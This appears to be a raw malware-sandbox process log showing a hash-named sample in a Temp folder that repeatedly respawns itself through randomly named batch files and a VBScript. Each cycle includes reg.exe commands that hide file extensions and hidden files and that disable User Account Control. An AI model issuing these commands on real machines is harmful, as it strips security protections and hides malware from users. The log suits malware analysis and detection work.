C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LUgMoQoI.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EiMUkYgU.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zMUIEIQM.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CyYoEwgo.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yWYQogks.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PCIEswMk.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DmIscMAY.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oUQUUYEg.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LIMEcUcA.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AmEYMwQw.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dAUUIAwA.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\issowQIs.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Wuggccwc.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JskYMkwY.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PcswMEAk.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KygwwAYs.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lcsUUAYg.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TgEIYYEQ.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qAwMMEYw.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HuoQAwAg.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

